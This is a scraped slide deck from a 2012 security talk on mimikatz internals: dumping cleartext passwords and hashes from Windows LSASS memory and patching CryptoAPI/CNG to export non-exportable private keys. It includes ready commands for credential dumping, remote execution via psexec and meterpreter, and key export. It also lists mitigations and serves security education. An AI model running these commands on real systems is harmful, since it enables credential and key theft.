Download presentation
Presentation is loading. Please wait.
1
mimikatz Benjamin DELPY `gentilkiwi` focus on sekurlsa/pass-the-pass
and crypto patches
2
Who ? Why ? Benjamin DELPY `gentilkiwi` Started to code mimikatz to :
French 26y Kiwi addict Lazy programmer Started to code mimikatz to : explain security concepts ; improve my knowledge ; prove to Microsoft that sometimes they must change old habits. Why all in French ? because I’m It limits script kiddies usage Hack with class 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
3
mimikatz working On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
x86 & x64 2000 support dropped with mimikatz 1.0 Everywhere ; it’s statically compiled Two modes direct action (local commands) – process or driver communication mimikatz.exe KeyIso « Isolation de clé CNG » LSASS.EXE Direct action : crypto::patchcng mimikatz.exe SamSS « Gestionnaire de comptes de sécurité » LSASS.EXE VirtualAllocEx, WriteProcessMemory, CreateRemoteThread... sekurlsa.dll EventLog « Journal d’événements Windows » SVCHOST.EXE Direct action : divers::eventdrop Open a pipe Write a welcome message Wait commands… and return results 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
4
mimikatz architecture of sekurlsa & crypto
mimikatz.exe mod_mimikatz_standard mod_parseur mod_mimikatz_winmine mod_text mod_cryptoapi mod_mimikatz_divers mod_memory mimikatz.sys mod_mimikatz_nogpo mod_secacl mod_mimikatz_crypto mod_crypto mod_mimikatz_impersonate mod_mimikatz_inject mod_pipe kappfree.dll mod_cryptoacng mod_mimikatz_samdump mod_inject mod_mimikatz_handle mod_hive kelloworld.dll mod_mimikatz_privilege mod_patch sam msv_1_0 mod_mimikatz_system mod_privilege klock.dll secrets tspkg mod_mimikatz_service mod_system msv_1_0 mod_mimikatz_sekurlsa wdigest mod_service sekurlsa.dll tspkg livessp mod_mimikatz_process mod_process wdigest kerberos mod_mimikatz_thread mod_thread livessp mod_mimikatz_terminalserver mod_ts kerberos 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
5
mimikatz :: sekurlsa what is it ?
mod_mimikatz_sekurlsa A module replacement for my previous favorite library ! A local module that can read data from the SamSS Service (well known LSASS process) What sekurlsa module can dump : MSV1_0 hashes TsPkg passwords Wdigest passwords LiveSSP passwords Kerberos passwords (!) …? 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
6
mimikatz :: sekurlsa how LSA works ( level)
PLAYSKOOL Authentication msv1_0 kerberos WinLogon LsaSS SAM user:domain:password Authentication Packages msv1_0 tspkg wdigest livessp kerberos Challenge Response 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
7
mimikatz :: sekurlsa how LSA works ( level)
PLAYSKOOL Authentication packages : take user’s credentials from the logon make their own stuff keep enough data in memory to compute responses of challenges (Single Sign On) If we can get data, and inject it in another session of LSASS, we avoid authentication part This is the principle of « Pass-the-hash » In fact, of « Pass-the-x » 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
8
mimikatz :: sekurlsa history of « pass-the-* » 1/2
Pass-the-hash Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN) Private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity) Microsoft ; Marc Murray (TrueSec) present msvctl, and provide some downloads of it « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity) mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;)) 2007 was the year of pass the hash ! Pass-the-ticket 04/ wce (pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity) 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
9
mimikatz :: sekurlsa history of « pass-the-* » 2/2
Pass-the-pass 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3) 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;)) 05/2011 – Some organizations opened cases to Microsoft about it… …Lots of time… begin of Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz 03/ Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extract… 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory 08/2012 – sekurlsa module without injection at all ! (ultra safe) 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
10
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough… 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
11
mimikatz :: sekurlsa :: tspkg what is it ?
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop users’s experience Rely on CredSSP with Credentials Delegation (!= Account delegation) Specs : First impression : it seems cool User does not have to type its password Password is not in RDP file Password is not in user secrets 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
12
mimikatz :: sekurlsa :: tspkg questions ?
KB says that for it works, we must enable « Default credentials » delegation “Default credentials : The credentials obtained when the user first logs on to Windows” - What ? Our User/Domain/{Password | Hash | Ticket} ? It seems … In all cases, system seems to be vulnerable to pass-the-*… In what form ? Our specs : [MS-CSSP] TSPasswordCreds The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN) TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING, userName [1] OCTET STRING, password [2] OCTET STRING } Challenge / response for authentication ? Serveur : YES (TLS / Kerberos) Client : NO ; *password* is sent to server… So password resides somewhere in memory ? 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
13
mimikatz :: sekurlsa :: tspkg symbols & theory
Let’s explore some symbols ! sounds cool… (thanks Microsoft) Let’s imagine a scenario Enumerate all sessions to obtain : Username Domain LUID Call tspkg!TSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain : TS_CREDENTIAL Call tspkg!TSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for : TS_PRIMARY_CREDENTIAL with clear text credentials… kd> x tspkg!*clear* 75016d1c tspkg!TSObtainClearCreds = <no type information> kd> x tspkg!*password* 75011b tspkg!TSDuplicatePassword = <no type information> 75011cd tspkg!TSHidePassword = <no type information> 750195ee tspkg!TSRevealPassword = <no type information> 75012fbd tspkg!TSUpdateCredentialsPassword = <no type information> kd> x tspkg!*locate* b tspkg!TSCredTableLocateDefaultCreds = <no type information> 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
14
mimikatz :: sekurlsa :: tspkg workflow
LsaEnumerateLogonSessions typedef struct _KIWI_TS_CREDENTIAL { #ifdef _M_X64 BYTE unk0[108]; #elif defined _M_IX86 BYTE unk0[64]; #endif LUID LocallyUniqueIdentifier; PVOID unk1; PVOID unk2; PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; for each LUID tspkg!TSGlobalCredTable KIWI_TS_CREDENTIAL typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { PVOID unk0; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Password; } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; RtlLookupElementGenericTableAvl KIWI_TS_CREDENTIAL KIWI_TS_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
15
mimikatz :: sekurlsa :: tspkg demo time !
07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
16
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
17
mimikatz :: sekurlsa :: wdigest what is it ?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]” Wikipedia : “Common Digest Authentication Scenarios : Authenticated client access to a Web site Authenticated client access using SASL Authenticated client access with integrity protection to a directory service using LDAP” Microsoft : Again, it seems cool No password over the network, just hashes No reversible password in Active Directory ; hashes for each realm Only with Advanced Digest authentication 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
18
mimikatz :: sekurlsa :: wdigest what is it ?
We speak about hashes, but what hashes ? H = MD5(HA1:nonce:[…]:HA2) HA1 = MD5(username:realm:password) HA2 = MD5(method:digestURI:[…]) Even after login, HA1 may change… realm is from server side and cannot be determined before Windows logon WDigest provider must have elements to compute responses for different servers : Username Realm (from server) Password 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
19
mimikatz :: sekurlsa :: wdigest theory
This time, we know : that WDigest keeps password in memory « by protocol » for HA1 digest that LSASS love to unprotect password with LsaUnprotectMemory (so protect with LsaProtectMemory) LsaUnprotectMemory At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE Let’s perform a research in WDigest : Hypothesis seems verified LsaProtectMemory At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE SpAcceptCredentials takes clear password in args Protect it with LsaProtectMemory Update or insert data in double linked list : wdigest!l_LogSessList .text:7409D call dword ptr [eax+0B4h] .text:74096C69 call dword ptr [eax+0B0h] 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
20
mimikatz :: sekurlsa :: wdigest workflow
LsaEnumerateLogonSessions typedef struct _KIWI_WDIGEST_LIST_ENTRY { struct _KIWI_WDIGEST_LIST_ENTRY *Flink; struct _KIWI_WDIGEST_LIST_ENTRY *Blink; DWORD UsageCount; struct _KIWI_WDIGEST_LIST_ENTRY *This; LUID LocallyUniqueIdentifier; […] LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; for each LUID wdigest!l_LogSessList search linked list for LUID KIWI_WDIGEST_LIST_ENTRY LsaUnprotectMemory password in clear ! 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
21
mimikatz :: sekurlsa :: wdigest demo time !
07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
22
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
23
mimikatz :: sekurlsa :: livessp how
Actually I’ve only used logical (empirical) approach to search passwords… : Protocol reading Symbols searching ~ Boring ~… be more brutal this time : make a WinDBG trap ! 0: kd> !process 0 0 lsass.exe PROCESS SessionId: 0 Cid: Peb: 7f43f000 ParentCid: 01b4 DirBase: 5df ObjectTable: 80ce4740 HandleCount: <Data Not Accessible> Image: lsass.exe 0: kd> .process /i You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code (first chance) nt!RtlpBreakWithStatusInstruction: 814b39d0 cc int 3 0: kd> .reload /user Loading User Symbols 0: kd> bp lsasrv!LsaProtectMemory "kc 5 ; g" 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
24
mimikatz :: sekurlsa :: livessp how
Let’s login with a Live account on Windows 8 ! After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest) lsasrv!LsaProtectMemory livessp!LiveMakeSupplementalCred livessp!LiveMakeSecPkgCredentials livessp!LsaApLogonUserEx2 livessp!SpiLogonUserEx2 msv1_0!NlpAddPrimaryCredential msv1_0!SspAcceptCredentials msv1_0!SpAcceptCredentials tspkg!TSHidePassword tspkg!SpAcceptCredentials Our LiveSSP provider Yeah, Pass the Hash capability with Live account too… Live user can logon through RDP via SSO 1: kd> uf /c livessp!LsaApLogonUserEx2 livessp!LsaApLogonUserEx2 ( ) [...] livessp!LsaApLogonUserEx2+0x560 (74781a96): call to livessp!LiveCreateLogonSession ( ) 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
25
mimikatz :: sekurlsa :: livessp workflow
LsaEnumerateLogonSessions typedef struct _KIWI_LIVESSP_LIST_ENTRY { struct _KIWI_LIVESSP_LIST_ENTRY *Flink; struct _KIWI_LIVESSP_LIST_ENTRY *Blink; PVOID unk0; PVOID unk1; PVOID unk2; PVOID unk3; DWORD unk4; DWORD unk5; PVOID unk6; LUID LocallyUniqueIdentifier; LSA_UNICODE_STRING UserName; PVOID unk7; PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds; } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY; for each LUID livessp!LiveGlobalLogonSessionList search linked list for LUID KIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIMARY_CREDENTIAL typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL { DWORD isSupp; DWORD unk0; LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL; LsaUnprotectMemory password in clear ! 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
26
mimikatz :: sekurlsa Even if we already have tools for normal accounts, are you not curious to test one with this trap ?* * Me, yes 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
27
mimikatz :: sekurlsa :: kerberos
Let’s login normal account After credentials protection, KerbCreateLogonSession calls : NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList lsasrv!LsaProtectMemory kerberos!KerbHideKey kerberos!KerbCreatePrimaryCredentials kerberos!KerbCreateLogonSession kerberos!SpAcceptCredentials kerberos!KerbHidePassword msv1_0!NlpAddPrimaryCredential msv1_0!SspAcceptCredentials msv1_0!SpAcceptCredentials wdigest!SpAcceptCredentials tspkg!TSHidePassword tspkg!SpAcceptCredentials Kerberos, ticket part ? Maybe ;) Kerberos part for password ?????? 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
28
mimikatz :: sekurlsa :: kerberos (nt6) workflow
LsaEnumerateLogonSessions for each LUID typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL { DWORD unk0; PVOID unk1; PVOID unk2; PVOID unk3; #ifdef _M_X64 BYTE unk4[32]; #elif defined _M_IX86 BYTE unk4[20]; #endif LUID LocallyUniqueIdentifier; BYTE unk5[44]; BYTE unk5[36]; LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; Kerberos!KerbGlobalLogonSessionTable KIWI_KERBEROS_PRIMARY_CREDENTIAL RtlLookupElementGenericTableAvl KIWI_KERBEROS_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
29
mimikatz :: sekurlsa :: kerberos (nt5) workflow
LsaEnumerateLogonSessions typedef struct _KIWI_KERBEROS_LOGON_SESSION { struct _KIWI_KERBEROS_LOGON_SESSION *Flink; struct _KIWI_KERBEROS_LOGON_SESSION *Blink; DWORD UsageCount; PVOID unk0; PVOID unk1; PVOID unk2; DWORD unk3; DWORD unk4; PVOID unk5; PVOID unk6; PVOID unk7; LUID LocallyUniqueIdentifier; #ifdef _M_IX86 DWORD unk8; #endif DWORD unk9; DWORD unk10; PVOID unk11; DWORD unk12; DWORD unk13; PVOID unk14; PVOID unk15; PVOID unk16; […] LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; for each LUID kerberos!KerbLogonSessionList search linked list for LUID KIWI_LIVESSP_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
30
mimikatz :: sekurlsa demo time !
Final sekurlsa demo sekurlsa::logonPasswords full 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
31
mimikatz :: sekurlsa :: kerberos “hu ?”
Ok It works…* But why ? Not at all logon on NT5 (can need an unlock) From my understanding of Microsoft explanations no need of passwords for the Kerberos protocol… all is based on the hash (not very sexy too) Microsoft’s implementation of Kerberos is full of logical… For password auth : password hash for shared secret, but keeping password in memory For full smartcard auth : No password on client No hash on client ? NTLM hash on client… KDC sent it back as a gift 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
32
mimikatz :: sekurlsa All passwords in memory are encrypted, but in a reversible way to be used We used LsaUnprotecMemory, in the LSASS context, to decrypt them This function rely on LsaEncryptMemory from lsasrv.dll For that, we previously inject a DLL (sekurlsa.dll) in the LSASS process to take benefits of its keys when we called it Can it be fun to decrypt outside the process ? Yes, it is… no more injection, just reading memory of LSASS process… mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we have the same comportments than when we are in LSASS ! LsaUnprotectMemory 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
33
mimikatz :: sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory use : RC4 DESx g_cbRandomKey DWORD ; 256 lsass lsasrv g_pRandomKey @BYTE[g_cbRandomKey] mimikatz lsasrv BYTE[g_cbRandomKey] copy… g_pDESXKey @BYTE[144] lsass lsasrv BYTE[144] g_Feedback BYTE[8] 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
34
mimikatz :: sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory use : 3DES AES InitializationVector BYTE[16] lsass lsasrv typedef struct _KIWI_BCRYPT_KEY_DATA { DWORD size; DWORD tag; DWORD type; DWORD unk0; DWORD unk1; DWORD unk2; DWORD unk3; PVOID unk4; BYTE data; /* etc... */ } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA; h3DesKey mimikatz lsasrv copy… lsass lsasrv typedef struct _KIWI_BCRYPT_KEY { DWORD size; DWORD type; PVOID unk0; PKIWI_BCRYPT_KEY_DATA cle; PVOID unk1; } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY; hAesKey 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
35
mimikatz :: sekurlsa memo
Security Packages Protection Keys Package Symbols Type tspkg tspkg!TSGlobalCredTable RTL_AVL_TABLE wdigest wdigest!l_LogSessList LIST_ENTRY livessp livessp!LiveGlobalLogonSessionList kerberos (nt5) kerberos!KerbLogonSessionList kerberos (nt6) kerberos!KerbGlobalLogonSessionTable msv1_0 lsasrv!LogonSessionList lsasrv!LogonSessionListCount ULONG Key NT 5 Symbols RC4 lsasrv!g_cbRandomKey lsasrv!g_pRandomKey DESx lsasrv!g_pDESXKey lsasrv!g_Feedback Key NT 6 Symbols lsasrv!InitializationVector 3DES lsasrv!h3DesKey AES lsasrv!hAesKey 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
36
mimikatz :: sekurlsa memo
Some commands : mimikatz privilege::debug "sekurlsa::logonPasswords full" exit psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug :32:28) */ // mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;234870 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : vm-w8-rp-x msv1_0 : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a efccd b1a kerberos : * Mot de passe : waza1234/ wdigest : tspkg : livessp : n.t. (LUID KO) 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
37
mimikatz :: sekurlsa what we can do ?
Basics No physical access to computer (first step to pass the hash, then pass the pass) No admin rights / system rights / debug privileges (…) Disable local admin accounts Strong passwords (haha, it was a joke ; so useless !!!) For privileged account, network login instead of interactive (when possible) Audit ; pass the hash keeps traces and can lock accounts No admin rights / system rights / debug privileges, even VIP Use separated network (or forest) for privileged tasks More in depth Force strong authentication (SmartCard & Token) : $ / € Short validity for Kerberos tickets No delegation Disable NTLM (available with NT6) No exotic : biometrics (it keeps password somewhere and push it to Windows) single sign on Stop shared secrets for authentication : push Public / Private stuff (like keys ;)) Let opportunities to stop retro compatibility Disable faulty providers ? Is it supported by Microsoft ? Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ? 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
38
mimikatz :: crypto what is it ?
mod_mimikatz_crypto A little module that I wrote to : play with Windows Cryptographic API / CNG and RSA keys automate export of certificates/keys Even those which are “not” exportable What crypto module can do : List Providers Stores Certificates Keys Export public in DER format with private keys in PFX format Private keys in PVK format it’s cool, OpenSSL can deal with it too Patch CryptoAPI in mimikatz context CNG in LSASS context (again !) 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
39
mimikatz :: crypto how it’s protected
Private keys are DPAPI protected You cannot reuse private key files on another computer At least without the master keys and/or password of users Computer/User can load their own keys because they have enough secrets to do it (ex : session opened) Yes, a computer/server open a “session” Export/Usage can be limited by : Password Popup Export/Archive flag no present Constraint for most user Unavailable for computer keys certutil -importpfx mycert.p12 NoExport certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
40
mimikatz :: crypto :: capi how it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardware.” Processes (mimikatz, IIS, Active Directory , Internet Explorer, yourappshere…) load some DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, … cryptdll.dll, rsaenh.dll, … Process deal with cryptographic keys by this API… 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
41
mimikatz :: crypto :: capi how it’s exported ( level)
PLAYSKOOL Process CryptoAPI and RSA CSP Load Private Key DPAPI Decode Exportable ? yes no Ask to export Key NTE_BAD_KEY_STATE Exported Key 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
42
mimikatz :: crypto :: patchcapi because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey This function do all the work to prepare the export, and check if the key is exportable Exportable ? ================ Certificat 0 ================ Numéro de série : a1c3ef46a301f99385f50680fa0 Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE Objet: CN=Benjamin Delpy, C=FR Il ne s'agit pas d'un certificat racine Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc e 24 a ac aa 7e Conteneur de clé = {470ADFBA B05E-B30776B75A03} Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0 La clé privée NE PEUT PAS être exportée Succès du test de cryptage CertUtil : -exportPFX ÉCHEC de la commande : 0x b ( ) CertUtil: Clé non valide pour l'utilisation dans l'état spécifié. mimikatz # crypto::exportCertificates Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My - Benjamin Delpy Container Clé : {470ADFBA B05E-B30776B75A03} Provider : Microsoft Enhanced Cryptographic Provider v1.0 Type : AT_KEYEXCHANGE Exportabilité : NON Taille clé : 2048 Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x b) Clé non valide pour l'utilisation dans l'état spécifié. Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
43
mimikatz :: crypto :: patchcapi because I own my process
So what ? A module in my own process return that I can’t do something ? CryptoAPI is in my memory space, let’s patch it ! I wrote “4” bytes in my memory space .text:0AC0B7CB 0F C7 FF FF jnz continue_key_export_or_archive .text:0AC0B7CB nop .text:0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive .text:0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare .text:0AC1F nop .text:0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
44
mimikatz :: crypto :: patchcapi demo time !
Import, export, import as not exportable…. export 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
45
mimikatz :: crypto :: patchcapi limitations
Because : I’m lazy I’ve seen in majority of case RSA keys for real life use Elliptic Curve a little… mimikatz crypto::patchcapi only deal with : Microsoft Base Cryptographic Provider v1.0 Microsoft Enhanced Cryptographic Provider v1.0 Microsoft Enhanced RSA and AES Cryptographic Provider Microsoft RSA SChannel Cryptographic Provider Microsoft Strong Cryptographic Provider …all based on rsaenh.dll 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
46
mimikatz :: crypto :: cng how it works
“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” “To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default. This time, keys operations are not made in the “user” process context Process use RPC to call “Key isolation service” (keyiso) functions It seems more secure than CryptoAPI… It is, but it’s not perfect… 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
47
mimikatz :: crypto :: cng how it’s exported ( level)
PLAYSKOOL NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP KeyIso Service (LSASS Process) CNG Load Private Key DPAPI Decode Exportable ? yes no RPC Process Ask to export Key NTE_NOT_SUPPORTED Exported Key 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
48
mimikatz :: crypto :: patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso):ncrypt!SPCryptExportKey This function do all the work to prepare the export, and check if the key is exportable Exportable ? mimikatz # crypto::exportKeys [user] Clés CNG : - cng_user_noexport-a e5b-4b9a-bf08-d35d75a9b318 Exportabilité : NON Taille clé : 2048 Export privé dans 'cng_user_0_cng_user_noexport-a e5b-4b9a-bf08-d35d75a9b318.pvk' : KO mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x ) L'opération demandée n'est pas prise en charge. 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
49
mimikatz :: crypto :: patchcng because sometimes I own LSASS
This time, checks and keys are in LSASS process… And what ? I wrote “1” byte in LSASS memory space… .text:6C C jnz short continue_key_export .text:6C EB 1C jmp short continue_key_export 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
50
mimikatz :: crypto :: patchcng demo time !
Import, export, import as not exportable…. export again 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
51
mimikatz :: crypto :: patchcng limitations
Patch operation needs some privileges Admin (debug privilege) SYSTEM mimikatz crypto::patchcng only deal with : Microsoft Software Key Storage Provider (maybe others algs than RSA) Not a limitation of mimikatz, but MMC addin for certificates cannot export CNG certificates… even those that are exportable (hu ?) certutil can… 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
52
mimikatz :: crypto :: patchcng bonus
After one admin patched LSASS, all users of current system benefit of extra exports until reboot / KeyIso service restart Some others programs that doesn’t check the export flag before asking export can work too Yeah, like the old good one : certutil C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY ================ Certificat 1 ================ […] Hach. cert. (sha1) : dc 00 c9 c7 9f f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de clé = cng_user_noexport-a e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La clé privée NE PEUT PAS être exportée Succès du test de chiffrement CertUtil : -exportPFX ÉCHEC de la commande : 0x b ( ) CertUtil: Clé non valide pour l'utilisation dans l'état spécifié. CertUtil: -exportPFX La commande s'est terminée correctement. 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
53
mimikatz :: crypto memo
Some commands : mimikatz crypto::patchcapi crypto::exportCertificates exit psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop" mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit Password : PFX files are protected by this password : mimikatz Keys When you import multiple time a certificate, exportable or not, Windows make duplicate keys When you delete a certificate, Windows does not delete its private key… funny isn’t it ? So yes, mimikatz can export it 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
54
mimikatz :: crypto what we can do ?
